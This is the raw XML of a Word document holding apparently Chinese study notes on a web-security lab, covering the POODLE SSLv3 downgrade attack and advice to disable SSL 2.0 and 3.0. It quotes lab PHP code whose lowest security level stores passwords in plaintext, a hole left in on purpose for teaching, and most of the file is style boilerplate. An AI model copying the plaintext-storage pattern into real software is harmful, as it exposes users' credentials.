        <w:t>SSLv3加密后的明文内容。因为兼容性问题，当浏览器进行HTTPS连接失败的时候，将会尝试使用旧的协议版本，这其中就包括SSL 3.0，于是加密协议由更加安全的协议（比如：TLS 1.0）降级成SSL 3.0。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32EEF3" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　攻击者在此漏洞利用中扮演一种中间人的角色，比如</w:t>
      </w:r>
      <w:r>
        <w:t>A，C进行通信，B（攻击者）在中间作为一个代理，B截获A，C之间的通信后经过SSLv3加密后的数据包，利用SSLv3中存在的漏洞，解密得到其数据包的明文信息，而这些明文信息极有可能是用户的隐私数据，比如Cookie，这样攻击者就可以拿到这些隐私数据，进行更深层次的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4905CD4C" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　由此可见此，黑客们可以利用此漏洞。截获用户的隐私数据，进而造成了用户隐私的泄漏，危害较大，应当引起我们的高度重视，而现今唯一解决该问题的方式就是禁用</w:t>
      </w:r>
      <w:r>
        <w:t>SSLv3加密协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF68C3" w14:textId="10340B4F" w:rsidR="001C6E51" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原文：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https://blog.csdn.net/Super_Yiang/article/details/83783659 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE6A67E" w14:textId="6D8E05DD" w:rsidR="001C6E51" w:rsidRDefault="001C6E51" w:rsidP="001C6E51"/>
    <w:p w14:paraId="7C83E42B" w14:textId="6AB5A8CA" w:rsidR="001C6E51" w:rsidRDefault="001C6E51" w:rsidP="001C6E51">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rStyle w:val="shorttext"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="shorttext"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSL 2.0不推荐使用的协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561932FC" w14:textId="09CB84D4" w:rsidR="001C6E51" w:rsidRDefault="00C50E37" w:rsidP="001C6E51">
      <w:r>
        <w:t>远程服务使用具有已知弱点的旧已弃用协议对流量进行加密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3716F" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="001C6E51"/>
    <w:p w14:paraId="7EF8B26F" w14:textId="458AC777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:t>SSL 2.0是1995年第一个公开发布的SSL版本。此版本的SSL包含许多导致SSL 3.0引入的安全问题。SSL 3.0于1996年发布，完全重新设计了协议。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7812F199" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7"/>
    <w:p w14:paraId="25E236F3" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>SSL2.0中出现的问题，协议使用起来不安全，应该完全禁用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7262CE08" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">POODLE（Padding Oracle On Downgraded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Legacy.Encryption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）漏洞，SSL 3.0使用起来也不安全，应该被禁用以避免攻击者检索到安全连接的明文。此外，Elliptic Curve Cryptography（本文稍后将讨论）不能与SSL3.0一起使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53870D3B" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7"/>
    <w:p w14:paraId="7F1361E1" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:t>Internet Explorer 6是唯一仍然使用SSL3.0的浏览器。因此，除非仍然需要支持旧版Internet Explorer 6浏览器，否则应禁用SSL 3.0。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF7D82" w14:textId="4BB8D82B" w:rsidR="001C6E51" w:rsidRDefault="001C6E51" w:rsidP="004C517F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文本文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722A6CDF" w14:textId="56F5DF40" w:rsidR="00ED3C0F" w:rsidRDefault="00ED3C0F" w:rsidP="001C6E51">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看源码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1EB102" w14:textId="77777777" w:rsidR="00ED3C0F" w:rsidRDefault="00ED3C0F" w:rsidP="00ED3C0F">
      <w:r>
        <w:t>switch($_COOKIE["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>security_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"]) { case "0" : $line = "'" . $username . "', '" . $password . "'" . "\r\n"; break; case "1" : $username = xss_check_3($username); $password = sha1($password, false); $line = "'" . $username . "', '" . $password . "'" . "\r\n"; break; case "2" : $username = xss_check_3($username); $salt = md5(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniqid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()); // $password = sha1($salt . $password, false); //$password = hash("sha512", $salt . $password, false); $password = hash("sha256", $salt . $password, false); $line = "'" . $username . "', '" . $password . "', 'salt:" . $salt . "'" . "\r\n"; break; default : $line = "'" . $username . "', '" . $password . "'" . "\r\n"; break; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786616A9" w14:textId="614A1C1B" w:rsidR="00C50E37" w:rsidRDefault="00C50E37" w:rsidP="001C6E51"/>
    <w:p w14:paraId="732511B9" w14:textId="6107C24F" w:rsidR="00ED3C0F" w:rsidRDefault="00ED3C0F" w:rsidP="001C6E51">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对密码进行加密或哈希</w:t>
      </w:r>
      <w:r w:rsidR="004C517F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不知道这个是不是考察这一点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014777D0" w14:textId="77777777" w:rsidR="00ED3C0F" w:rsidRDefault="00ED3C0F" w:rsidP="001C6E51"/>
    <w:p w14:paraId="79962304" w14:textId="783BB1F1" w:rsidR="00C50E37" w:rsidRDefault="00C50E37" w:rsidP="001C6E51">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50E37">
        <w:t>https://blog.csdn.net/Super_Yiang/article/details/83783659</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25266AE8" w14:textId="314FB4A7" w:rsidR="00C50E37" w:rsidRDefault="00C50E37" w:rsidP="001C6E51"/>
    <w:p w14:paraId="59D22EED" w14:textId="6F5F2624" w:rsidR="00C50E37" w:rsidRDefault="00C50E37" w:rsidP="001C6E51"/>
    <w:p w14:paraId="3047306F" w14:textId="77777777" w:rsidR="00C50E37" w:rsidRPr="00C50E37" w:rsidRDefault="00C50E37" w:rsidP="001C6E51">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00C50E37" w:rsidRPr="00C50E37">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3161A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38068FF8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="444" w:hanging="444"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1236" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2112" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2628" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3504" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4380" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4896" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5772" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6648" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="26BC232F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D70AA84"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="516" w:hanging="516"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="516" w:hanging="51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7E2"/>
    <w:rsid w:val="00034B22"/>
    <w:rsid w:val="00055E17"/>
    <w:rsid w:val="00062E5B"/>
    <w:rsid w:val="00065274"/>
    <w:rsid w:val="00073750"/>
    <w:rsid w:val="000819CB"/>
    <w:rsid w:val="0009740F"/>
    <w:rsid w:val="000979A5"/>
    <w:rsid w:val="000B682A"/>
    <w:rsid w:val="000C20B9"/>
    <w:rsid w:val="000D42E0"/>
    <w:rsid w:val="001153F3"/>
    <w:rsid w:val="001505A1"/>
    <w:rsid w:val="00157D6C"/>
    <w:rsid w:val="001A2910"/>
    <w:rsid w:val="001B6C51"/>
    <w:rsid w:val="001C6E51"/>
    <w:rsid w:val="001C7B1B"/>
    <w:rsid w:val="00227106"/>
    <w:rsid w:val="002368B4"/>
    <w:rsid w:val="00242270"/>
    <w:rsid w:val="00286742"/>
    <w:rsid w:val="002E21E7"/>
    <w:rsid w:val="002E6F9A"/>
    <w:rsid w:val="00343156"/>
    <w:rsid w:val="00357C2E"/>
    <w:rsid w:val="00360E9E"/>
    <w:rsid w:val="00373DBB"/>
    <w:rsid w:val="0037618D"/>
    <w:rsid w:val="0038419C"/>
    <w:rsid w:val="003B2A05"/>
    <w:rsid w:val="003B3685"/>
    <w:rsid w:val="003B5029"/>
    <w:rsid w:val="003C2A00"/>
    <w:rsid w:val="003C3C63"/>
    <w:rsid w:val="003E5308"/>
    <w:rsid w:val="00405F46"/>
    <w:rsid w:val="00455990"/>
    <w:rsid w:val="00461C88"/>
    <w:rsid w:val="004755E1"/>
    <w:rsid w:val="00492003"/>
    <w:rsid w:val="004C517F"/>
    <w:rsid w:val="004C585A"/>
    <w:rsid w:val="004D7BE7"/>
    <w:rsid w:val="004E4D08"/>
    <w:rsid w:val="004F42C3"/>
    <w:rsid w:val="005168C8"/>
    <w:rsid w:val="005237DC"/>
    <w:rsid w:val="00540593"/>
    <w:rsid w:val="00540A59"/>
    <w:rsid w:val="00545B49"/>
    <w:rsid w:val="005873DE"/>
    <w:rsid w:val="005D17E2"/>
    <w:rsid w:val="005D3502"/>
    <w:rsid w:val="005D738D"/>
    <w:rsid w:val="005E06A1"/>
    <w:rsid w:val="005E3C1D"/>
    <w:rsid w:val="005F5D66"/>
    <w:rsid w:val="006035CF"/>
    <w:rsid w:val="00614691"/>
    <w:rsid w:val="006213C8"/>
    <w:rsid w:val="00634E76"/>
    <w:rsid w:val="00655141"/>
    <w:rsid w:val="006758D8"/>
    <w:rsid w:val="00685F03"/>
    <w:rsid w:val="006B5D5B"/>
    <w:rsid w:val="006C0E76"/>
    <w:rsid w:val="006C3109"/>
    <w:rsid w:val="00705CF9"/>
    <w:rsid w:val="00710F7C"/>
    <w:rsid w:val="0071783B"/>
    <w:rsid w:val="00746D2C"/>
    <w:rsid w:val="00773354"/>
    <w:rsid w:val="007B072C"/>
    <w:rsid w:val="007B613A"/>
    <w:rsid w:val="007C73C2"/>
    <w:rsid w:val="007F025E"/>
    <w:rsid w:val="00806689"/>
    <w:rsid w:val="00857AF4"/>
    <w:rsid w:val="00862347"/>
    <w:rsid w:val="00863636"/>
    <w:rsid w:val="00875957"/>
    <w:rsid w:val="00875EF8"/>
    <w:rsid w:val="008922F0"/>
    <w:rsid w:val="00897641"/>
    <w:rsid w:val="008A0F11"/>
    <w:rsid w:val="008D57CE"/>
    <w:rsid w:val="008E6CB2"/>
    <w:rsid w:val="008F52B4"/>
    <w:rsid w:val="0093787E"/>
    <w:rsid w:val="009564CB"/>
    <w:rsid w:val="0096606D"/>
    <w:rsid w:val="009909CC"/>
    <w:rsid w:val="00996186"/>
    <w:rsid w:val="009D7009"/>
    <w:rsid w:val="009F2059"/>
    <w:rsid w:val="00A04A3F"/>
    <w:rsid w:val="00A71BBC"/>
    <w:rsid w:val="00A81A91"/>
    <w:rsid w:val="00A934A1"/>
    <w:rsid w:val="00AA6382"/>
    <w:rsid w:val="00AB6667"/>
    <w:rsid w:val="00AC18B9"/>
    <w:rsid w:val="00AC2324"/>
    <w:rsid w:val="00B538CB"/>
    <w:rsid w:val="00B57CF6"/>
    <w:rsid w:val="00B616DF"/>
    <w:rsid w:val="00B94EAE"/>
    <w:rsid w:val="00BC1B2F"/>
    <w:rsid w:val="00C108EA"/>
    <w:rsid w:val="00C17661"/>
    <w:rsid w:val="00C27734"/>
    <w:rsid w:val="00C36F69"/>
    <w:rsid w:val="00C508D1"/>
    <w:rsid w:val="00C50E37"/>
    <w:rsid w:val="00C83A83"/>
    <w:rsid w:val="00CD15B5"/>
    <w:rsid w:val="00CD7EF5"/>
    <w:rsid w:val="00CE0FD7"/>
    <w:rsid w:val="00CE56CD"/>
    <w:rsid w:val="00CE57B6"/>
    <w:rsid w:val="00D16586"/>
    <w:rsid w:val="00D45E7A"/>
    <w:rsid w:val="00D712AD"/>
    <w:rsid w:val="00D85A76"/>
    <w:rsid w:val="00DB7147"/>
    <w:rsid w:val="00DB74B0"/>
    <w:rsid w:val="00DD595B"/>
    <w:rsid w:val="00DF5551"/>
    <w:rsid w:val="00E342E5"/>
    <w:rsid w:val="00E7491F"/>
    <w:rsid w:val="00EB3504"/>
    <w:rsid w:val="00EB4BE8"/>
    <w:rsid w:val="00ED3C0F"/>
    <w:rsid w:val="00EE3983"/>
    <w:rsid w:val="00F062A9"/>
    <w:rsid w:val="00F16B9E"/>
    <w:rsid w:val="00F228B1"/>
    <w:rsid w:val="00F30FAD"/>
    <w:rsid w:val="00F37C80"/>
    <w:rsid w:val="00F64C6D"/>
    <w:rsid w:val="00FA3B9F"/>
    <w:rsid w:val="00FB26CE"/>
    <w:rsid w:val="00FB594F"/>
    <w:rsid w:val="00FC0C36"/>
    <w:rsid w:val="00FC7FDB"/>
    <w:rsid w:val="00FF1A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C326E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A9619A78-FB70-403E-9D31-091EEBA9B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897641"/>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F42C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4F42C3"/>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062E5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D42E0"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D42E0"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004F42C3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004F42C3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004F42C3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B94EAE"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00062E5B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00897641"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="shorttext">
    <w:name w:val="short_text"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C17661"/>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00C508D1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00685F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685F03"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00685F03"/>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248730">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="209616707">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214238499">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="297808530">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1292440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8806604">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="401146888">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="470249061">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1674718069">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1249730430">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="511527021">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="637491114">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="807669256">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
